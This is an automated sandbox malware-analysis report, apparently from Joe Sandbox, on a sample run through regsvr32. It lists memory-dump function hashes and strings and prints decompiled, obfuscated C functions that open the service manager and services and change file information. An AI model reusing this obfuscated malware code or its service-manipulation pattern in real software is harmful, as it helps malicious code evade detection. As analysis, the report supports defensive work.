-9s, xrefs: 002892A6
WG, xrefs: 00289228

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -9s$WG$[<$rer$$~1}$K
API String ID: 0-110663538
Opcode ID: 8bf16e450180743f936170045edf9d61e7342ac6fc9db8fd0774e565b7df078e
Instruction ID: 7ff5746f13eabf4fd930f8a8d0f1dc27f74f5350d4dce1a8ce78f7e18a36cbd6
Opcode Fuzzy Hash: 8bf16e450180743f936170045edf9d61e7342ac6fc9db8fd0774e565b7df078e
Instruction Fuzzy Hash: EDA160B50193828FC368DF25C48592BFBE0FB85748F04891DF196862A0D7B5CA99CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0028C16B Relevance: 7.7, Strings: 6, Instructions: 208COMMON

Download Yara Rule

Strings

sR, xrefs: 0028C178
E+, xrefs: 0028C1A3
LYQ, xrefs: 0028C30D
/x], xrefs: 0028C37D
3Vt, xrefs: 0028C32D
t&, xrefs: 0028C223

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /x]$3Vt$E+$LYQ$t&$sR
API String ID: 0-93619843
Opcode ID: 892d3866b07cf26c89770190330850e3795fc84d7b516d20d347c5d155e1b93c
Instruction ID: 37c139cf2ce034bfc9c0ae2ba4ef14476171ffa34a50930f679254ea4e2858c5
Opcode Fuzzy Hash: 892d3866b07cf26c89770190330850e3795fc84d7b516d20d347c5d155e1b93c
Instruction Fuzzy Hash: 0D9156728193419FC354DF24D48541BFBF0FBC4364F608A2EF499A62A0D7B19A69CF86

Uniqueness

Uniqueness Score: -1.00%

Function 0027BB23 Relevance: 7.6, Strings: 6, Instructions: 129COMMON

Download Yara Rule

Strings

$Fh, xrefs: 0027BC80
], xrefs: 0027BC41
ID<, xrefs: 0027BB8F
"), xrefs: 0027BB88
?-, xrefs: 0027BB44
3H1-, xrefs: 0027BBD9

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ?-$")$$Fh$3H1-$ID<$]
API String ID: 0-3929424130
Opcode ID: a2758349ab9c694a1e2add9b5d7ca7eddef9150915f27556ec36d573dce76b32
Instruction ID: 0f046c5d6c59a30df94e7e310246a96747006c5b257df17426fc9e609e433c6b
Opcode Fuzzy Hash: a2758349ab9c694a1e2add9b5d7ca7eddef9150915f27556ec36d573dce76b32
Instruction Fuzzy Hash: 6F511FB1C0130AEBCF19CFA5D98A9EEFBB1BB08314F208159D415B62A0D3B56A55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0027D346 Relevance: 7.6, Strings: 6, Instructions: 114COMMON

Download Yara Rule

Strings

Lm, xrefs: 0027D415
r%, xrefs: 0027D438
cx:, xrefs: 0027D466
ZD, xrefs: 0027D407
D0}, xrefs: 0027D44D
YH, xrefs: 0027D3C8

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: D0}$Lm$YH$ZD$cx:$r%
API String ID: 0-3548761854
Opcode ID: 02a3ea94301466fef6229fc89170e67c0539da7510491c0de4342e7ec62d8958
Instruction ID: e86a0e618e31ab509b2fd7ac40e71019d9566b01905258160b6b420cc629c5a0
Opcode Fuzzy Hash: 02a3ea94301466fef6229fc89170e67c0539da7510491c0de4342e7ec62d8958
Instruction Fuzzy Hash: 025130B1C0121DEBCF08CFA1C94A9EEFBB1FB48304F208149E5257A260D7B95A59CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00285D68 Relevance: 6.6, Strings: 5, Instructions: 374COMMON

Download Yara Rule

Strings

F$d, xrefs: 002863BF
+k7, xrefs: 00286144
F$d, xrefs: 00286307
w, xrefs: 00285DB9
F$d, xrefs: 00286200

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +k7$F$d$F$d$F$d$w
API String ID: 0-3867346267
Opcode ID: ceb74a77ab9d453331cba4ba3c6ec009f5f6ff4c40de2827c2fb732a6b39028d
Instruction ID: 3d3deee2afa8656576c7e33727c51baebb92ee0cb963dea9bbeebf846981998d
Opcode Fuzzy Hash: ceb74a77ab9d453331cba4ba3c6ec009f5f6ff4c40de2827c2fb732a6b39028d
Instruction Fuzzy Hash: A9023575D013199BDF28DFE5C8896DEBBB1FB44314F208099E519BA2A0D7B40A99CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0027BE09 Relevance: 6.5, Strings: 5, Instructions: 290COMMON

Download Yara Rule

Strings

eK, xrefs: 0027C1D6
)o, xrefs: 0027C16D
-dy, xrefs: 0027C0AD
3, xrefs: 0027BF8A
HaeO, xrefs: 0027C0F3

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )o$-dy$HaeO$eK$3
API String ID: 0-603960384
Opcode ID: 4a52f4ca869f3da7686338bc6e7044bd674b3a052ce262831294c40cdc1979d2
Instruction ID: 588c18244f186411f9761036cb20027b80b32fecde8a240f226e8fd256e1f3a0
Opcode Fuzzy Hash: 4a52f4ca869f3da7686338bc6e7044bd674b3a052ce262831294c40cdc1979d2
Instruction Fuzzy Hash: 4BE11F714183819FD3A8CF65D48AA5FBBE1FBC4348F608A1DF6DA86260D7B08559CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00285497 Relevance: 6.5, Strings: 5, Instructions: 250COMMON

Download Yara Rule

Strings

p, xrefs: 00285579
+v+, xrefs: 00285619
*:, xrefs: 00285599
NjK(, xrefs: 00285556
@wm, xrefs: 002854D5

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +v+$@wm$NjK($*:$p
API String ID: 0-875346305
Opcode ID: 3e8cbfc83a24f3150cdeedfdf7e90bc742e5249f60c7edd6bb86985113d6c748
Instruction ID: 0f6eac6b25674035850ff3c7735757e2ecd29cf40d582d73e48613bff243f09d
Opcode Fuzzy Hash: 3e8cbfc83a24f3150cdeedfdf7e90bc742e5249f60c7edd6bb86985113d6c748
Instruction Fuzzy Hash: 0DB1CAB1D2161EEBCF18DFA1D88A9EEBBB1FF04314F208009D516B6290E7715A58CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00279617 Relevance: 6.5, Strings: 5, Instructions: 245COMMON

Download Yara Rule

Strings

"/, xrefs: 00279681
Doi, xrefs: 002798A6
"/, xrefs: 002799AB
\T, xrefs: 002797A5
+, xrefs: 0027993D

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Doi$\T$"/$"/$+
API String ID: 0-3147750428
Opcode ID: d5f4024f09f5ed523928eaeaa7ba6153f29e78ca5913b6dd43fa4a2fcd4c5c72
Instruction ID: 671cd90a6217da9fbe3defeed431f0409e893fa65e661586e1764c6d5838dca8
Opcode Fuzzy Hash: d5f4024f09f5ed523928eaeaa7ba6153f29e78ca5913b6dd43fa4a2fcd4c5c72
Instruction Fuzzy Hash: 85C11171518381AFD368CF66C58990BFBE2FBD4748F108A1DF69986260D3B2C959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 002913FD Relevance: 6.5, Strings: 5, Instructions: 223COMMON

Download Yara Rule

Strings

h3e,, xrefs: 002914BD
QH, xrefs: 0029148E
*L, xrefs: 00291629
A\-, xrefs: 0029167B
J, xrefs: 00291683

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *L$A\-$J$h3e,$QH
API String ID: 0-4100447355
Opcode ID: e839d07005306f2130347311bbac1356c48dd04d3bb43f3ce44035a36dcad84e
Instruction ID: 30383656b233c6615c79e33f8e9e561689356395ef28fa5cb35e2de0247064fd
Opcode Fuzzy Hash: e839d07005306f2130347311bbac1356c48dd04d3bb43f3ce44035a36dcad84e
Instruction Fuzzy Hash: 50B130724087829FC758DF66C88A40BFBF1BBC4748F508A1DF59596260D7B1C919CF42

Uniqueness

Uniqueness Score: -1.00%

Function 002903F2 Relevance: 6.5, Strings: 5, Instructions: 217COMMON

Download Yara Rule

Strings

$7, xrefs: 00290529
z, xrefs: 002905C2
^`9, xrefs: 002904E6
*, xrefs: 002906E0
H, xrefs: 002904AD

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $7$^`9$z$H$*
API String ID: 0-3857458238
Opcode ID: ddfbc14e96cb4e91ff7c0cb37d2f2633a83a3a396bb414aa2d7bd8244eeb717c
Instruction ID: 2a5a7aea7cea65c3256d3ad78c7a62e8116e3e10f800adc0e76313227e8ffaca
Opcode Fuzzy Hash: ddfbc14e96cb4e91ff7c0cb37d2f2633a83a3a396bb414aa2d7bd8244eeb717c
Instruction Fuzzy Hash: 7EA152715183419FC758DF25C48AA5FFBE2ABC9758F10891DF18686260C3B19A99CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00283CDD Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

vC, xrefs: 00283E6E
+{, xrefs: 00283D4C
w, xrefs: 00283D24
@7Y, xrefs: 00283D85
4, xrefs: 00283D3C

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: @7Y$w$+{$4$vC
API String ID: 0-3184633685
Opcode ID: 95673c5a133e32f0b1bd716356d782cd0becb9a77bb0a5ec4eab1c79d0bc71ed
Instruction ID: 69312e579281bcba81a028d1b81b2dd8b7547808a08b427443b079bee1da6eb0
Opcode Fuzzy Hash: 95673c5a133e32f0b1bd716356d782cd0becb9a77bb0a5ec4eab1c79d0bc71ed
Instruction Fuzzy Hash: 1D71867151A3019FC368DE25C44955FFBF0EFC9B18F10891DF29A962A0D7B19A1A8F83

Uniqueness

Uniqueness Score: -1.00%

Function 002851E8 Relevance: 6.4, Strings: 5, Instructions: 154COMMON

Download Yara Rule

Strings

um, xrefs: 00285316
A>P, xrefs: 0028535F
6H, xrefs: 00285213
eo, xrefs: 002853D5
CD, xrefs: 002852D7

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 6H$A>P$CD$eo$um
API String ID: 0-474192316
Opcode ID: c7ce2ae73c3fa4834aa50ff68d70a4c0a385656d3728889ffedf5062274bf423
Instruction ID: b9827f3528de602944fdaec955bc5170aa28e11b54c8724455a1488af3d414d4
Opcode Fuzzy Hash: c7ce2ae73c3fa4834aa50ff68d70a4c0a385656d3728889ffedf5062274bf423
Instruction Fuzzy Hash: 576132B21193819BC794CF24C58881FFBE1FBC4B58F505A1DF69696260C3B6CA58CB83

Uniqueness

Uniqueness Score: -1.00%

Function 00290E6D Relevance: 6.4, Strings: 5, Instructions: 146COMMON

Download Yara Rule

Strings

l_, xrefs: 00290EFD
!, xrefs: 00290F2A
`w, xrefs: 00290F12
3!, xrefs: 00290FFF
-kF, xrefs: 00290F8C

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !$-kF$3!$`w$l_
API String ID: 0-379462258
Opcode ID: 2d88cc99618aa7052ab3fa669e90ba999428c38fc3a77400f004d2006d5a7ae0
Instruction ID: 9cb6030586593a5eb51ec65778fb502237fa61ec471439ead13247e3862c501c
Opcode Fuzzy Hash: 2d88cc99618aa7052ab3fa669e90ba999428c38fc3a77400f004d2006d5a7ae0
Instruction Fuzzy Hash: 5C6165715083429FC748DE65C88981BFBE1FFC8368F504A0DF69656260D3B6CA698F83

Uniqueness

Uniqueness Score: -1.00%

Function 0028E612 Relevance: 6.4, Strings: 5, Instructions: 113COMMON

Download Yara Rule

Strings

%Dx, xrefs: 0028E6A3
%N, xrefs: 0028E72D
2qZ, xrefs: 0028E656
Qbn0, xrefs: 0028E77E
R, xrefs: 0028E65E

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: R$%Dx$%N$2qZ$Qbn0
API String ID: 0-3168811252
Opcode ID: 2a0d222ef357ecf91e6184812a78a916979371965e5778ee977309b71a786642
Instruction ID: eab12bc25cd013921d30acdf7e1b59c7a120b7ed05f65899d66fd958cb08528c
Opcode Fuzzy Hash: 2a0d222ef357ecf91e6184812a78a916979371965e5778ee977309b71a786642
Instruction Fuzzy Hash: AB5144705193419FC788DF25E58541FBBE1FBC8358F509A1DF09696260D3B0CA598F87

Uniqueness

Uniqueness Score: -1.00%

Function 0028B384 Relevance: 5.1, Strings: 4, Instructions: 116COMMON

Download Yara Rule

Strings

<e, xrefs: 0028B43D
>, xrefs: 0028B4C7
:], xrefs: 0028B397
r3B, xrefs: 0028B48B

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: :]$<e$>$r3B
API String ID: 0-1485665402
Opcode ID: eb99dc27ef89dc69684e43775f39206b32631dee6518afd9d64609821c688640
Instruction ID: 82d95ee21238474f76e908443ea2c56ad1a74245f363867a0b783b4c0e15b25a
Opcode Fuzzy Hash: eb99dc27ef89dc69684e43775f39206b32631dee6518afd9d64609821c688640
Instruction Fuzzy Hash: 6D5153B5C0231A9BDF08CFA5D98A5EEBBB5BF44318F20819AC511B6250D7740B0ACFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0028F060 Relevance: 5.1, Strings: 4, Instructions: 115COMMON

Download Yara Rule

Strings

J(~|, xrefs: 0028F12B
DJ, xrefs: 0028F14C
o], xrefs: 0028F0E1
W , xrefs: 0028F0F1

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: DJ$J(~|$W $o]
API String ID: 0-2407399925
Opcode ID: 3bcc12f5ac2fc5b32713252af09d2934497e3cf7aaa2271855ffcfbd2aa4a50c
Instruction ID: 0ba69dd3bdf3eb8a0c72cc74fed072e577e8025c9c876f10c43d245c992a960a
Opcode Fuzzy Hash: 3bcc12f5ac2fc5b32713252af09d2934497e3cf7aaa2271855ffcfbd2aa4a50c
Instruction Fuzzy Hash: BB4178711093429BC798EF20C94981FBBE5FBD4708F50492DF59692261D7B1CA59CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00273210 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

5O, xrefs: 0027328C

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5O
API String ID: 0-3554415879
Opcode ID: 117fe49bdc0c380fcedb7bed50cd8c9b52d389e5ccd2a684ca72bd4a1284e88b
Instruction ID: 7888f861adc8481d929e776b9d7724107cd24fb14c834032f99cdd38db02e8f4
Opcode Fuzzy Hash: 117fe49bdc0c380fcedb7bed50cd8c9b52d389e5ccd2a684ca72bd4a1284e88b
Instruction Fuzzy Hash: E711F574D0120DEFCB48DFA5D55A8AEFBB2FB44314F20C199D915A72A0DB741A09DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00278AB6 Relevance: 5.1, Strings: 4, Instructions: 76COMMON

Download Yara Rule

Strings

dhk, xrefs: 00278B0A
r6AE, xrefs: 00278BA0
Ro, xrefs: 00278B03
EB, xrefs: 00278AFC

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: EB$Ro$dhk$r6AE
API String ID: 0-2099334332
Opcode ID: 8ded8689f180641a5ab20496f1ba73a3df264ba8d5702e898de1b782b3fc9de6
Instruction ID: 0f2b2ad4b65d492b8c3c12c341cf7a7ae70abdd130105f578fee00f97c829816
Opcode Fuzzy Hash: 8ded8689f180641a5ab20496f1ba73a3df264ba8d5702e898de1b782b3fc9de6
Instruction Fuzzy Hash: F031D472900209FBDF15DFD5D90AADE7F72FF18304F108188FA1566161D3B19A61AF90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 3060, Parent PID: 2924COMMON

Execution Graph

Execution Coverage:	16.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1055
Total number of Limit Nodes:	17

Executed Functions

Function 00CCF1D5 Relevance: 1.6, APIs: 1, Instructions: 69
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E00CCF1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				intOrPtr* _t58;
				void* _t59;
				signed int _t62;
				void* _t67;
				void* _t68;

				_t68 = __edx;
				_t67 = __ecx;
				E00CC9E7D(_t49);
				_v36 = 0xea873e;
				_v32 = 0xb2392b;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0xdc192d;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 + 0x11b5;
				_v12 = _v12 ^ 0x0007f5c7;
				_v20 = 0x6dcef4;
				_t62 = 0x6b;
				_v20 = _v20 * 0x54;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0xe81a0a50;
				_v16 = 0x9ccfab;
				_v16 = _v16 | 0xc76ed5d6;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x000c5bda;
				_v8 = 0xcca784;
				_v8 = _v8 / _t62;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x01549e3f;
				_v8 = _v8 ^ 0x01571d5c;
				_t58 = E00CDBFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
				_t59 =  *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
				return _t59;
			}

0x00ccf1e5
0x00ccf1ea
0x00ccf1f5
0x00ccf1fa
0x00ccf203
0x00ccf20a
0x00ccf20d
0x00ccf210
0x00ccf217
0x00ccf21b
0x00ccf21f
0x00ccf226
0x00ccf22d
0x00ccf23a
0x00ccf23e
0x00ccf241
0x00ccf245
0x00ccf24c
0x00ccf253
0x00ccf25a
0x00ccf25e
0x00ccf265
0x00ccf276
0x00ccf279
0x00ccf27d
0x00ccf284
0x00ccf2a3
0x00ccf2b0
0x00ccf2b8

APIs

SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 00CCF2B0

Memory Dump Source

Source File: 00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000009.00000002.733701016.0000000000CC0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.733717497.0000000000CE4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction ID: 03be5b441c0265930684b47d78acf1104b4cfa69fb6747d8b6f941534f5ac4e3
Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction Fuzzy Hash: 0D2146B5D0121DAFDB08DFA5C88A8EEBBB4FB44708F10809DE515AA240C7B45B54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CC32B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00CC32B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t62;
				signed int _t64;
				signed int _t65;

				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				E00CC9E7D(_t49);
				_v32 = 0xf329ca;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0x2373b;
				_t64 = 0x7a;
				_v16 = _v16 * 0x75;
				_t65 = 0x3d;
				_v16 = _v16 / _t64;
				_v16 = _v16 ^ 0x00061266;
				_v12 = 0xb7be71;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0xafdb;
				_v12 = _v12 ^ 0x7920a4e8;
				_v12 = _v12 ^ 0x79205c77;
				_v8 = 0x1abc5;
				_v8 = _v8 / _t65;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x07f89b39;
				_v8 = _v8 ^ 0x07caeaee;
				_v20 = 0x49b926;
				_v20 = _v20 * 0x47;
				_v20 = _v20 ^ 0x147483b3;
				E00CDBFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
				_t62 = OpenSCManagerW(0, 0, _a4); // executed
				return _t62;
			}

0x00cc32be
0x00cc32bf
0x00cc32c2
0x00cc32c3
0x00cc32c8
0x00cc32cd
0x00cc32d6
0x00cc32d9
0x00cc32dc
0x00cc32e9
0x00cc32ec
0x00cc32f4
0x00cc32f5
0x00cc32fa
0x00cc3304
0x00cc330b
0x00cc330f
0x00cc3316
0x00cc331d
0x00cc3324
0x00cc3335
0x00cc3338
0x00cc333c
0x00cc3343
0x00cc334a
0x00cc3361
0x00cc3364
0x00cc3377
0x00cc3384
0x00cc338a

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 00CC3384

Strings

w\ y, xrefs: 00CC331D

Memory Dump Source

Source File: 00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000009.00000002.733701016.0000000000CC0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.733717497.0000000000CE4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: w\ y
API String ID: 1889721586-240614871
Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction ID: 05a13da4d2495677e8798ca939fee7a22c160abd691831083c063692772224df
Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction Fuzzy Hash: E82123B5D01228FBCB04DFA9D84A9EEBFB5FB40304F208189E424A6250D3B55B40DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CCC4EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E00CCC4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t46;
				void* _t54;
				int _t58;

				_push(_a16);
				_t58 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00CC9E7D(_t46);
				_v24 = _v24 & 0x00000000;
				_v36 = 0xd40f1;
				_v32 = 0xcb52a0;
				_v28 = 0x146fa1;
				_v20 = 0xb8dab7;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x0b80f677;
				_v8 = 0x87dd92;
				_v8 = _v8 + 0xffffe9d3;
				_v8 = _v8 * 0x55;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x54d92ec5;
				_v16 = 0xb88fea;
				_v16 = _v16 | 0xf85cd4fd;
				_v16 = _v16 + 0xed22;
				_v16 = _v16 ^ 0xf8f0d6dc;
				_v12 = 0x2c3d87;
				_v12 = _v12 + 0x3690;
				_v12 = _v12 + 0xfffff048;
				_v12 = _v12 ^ 0x0029d00c;
				E00CDBFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
				return _t54;
			}

0x00ccc4f2
0x00ccc4f5
0x00ccc4f7
0x00ccc4fa
0x00ccc4fd
0x00ccc500
0x00ccc501
0x00ccc502
0x00ccc507
0x00ccc50e
0x00ccc515
0x00ccc51c
0x00ccc523
0x00ccc52a
0x00ccc52d
0x00ccc531
0x00ccc538
0x00ccc53f
0x00ccc556
0x00ccc55e
0x00ccc562
0x00ccc569
0x00ccc570
0x00ccc577
0x00ccc57e
0x00ccc585
0x00ccc58c
0x00ccc593
0x00ccc59a
0x00ccc5ad
0x00ccc5bc
0x00ccc5c2

APIs

OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 00CCC5BC

Strings

", xrefs: 00CCC577

Memory Dump Source

Source File: 00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000009.00000002.733701016.0000000000CC0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.733717497.0000000000CE4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: "
API String ID: 3098006287-1598837362
Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction ID: 7b5edbba105ef562ef9fb41903ab75498e164c0835d113891d6e7131e9f8af12
Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction Fuzzy Hash: B52120B5C0020DEBCF15DFA4D8499EEBBB4FF14318F108588E92566260E3B15B18DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CDA98E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00CDA98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t45;
				int _t58;
				signed int _t60;
				signed int _t61;

				_push(_a8);
				_push(_a4);
				E00CC9E7D(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xdfb18c;
				_v12 = 0xac05d3;
				_v12 = _v12 + 0xffffe692;
				_t60 = 6;
				_v12 = _v12 * 0xa;
				_v12 = _v12 ^ 0x06b0bc77;
				_v20 = 0xcbcea5;
				_t61 = 0x73;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x0026c0c8;
				_v16 = 0x706a69;
				_v16 = _v16 + 0xffff322e;
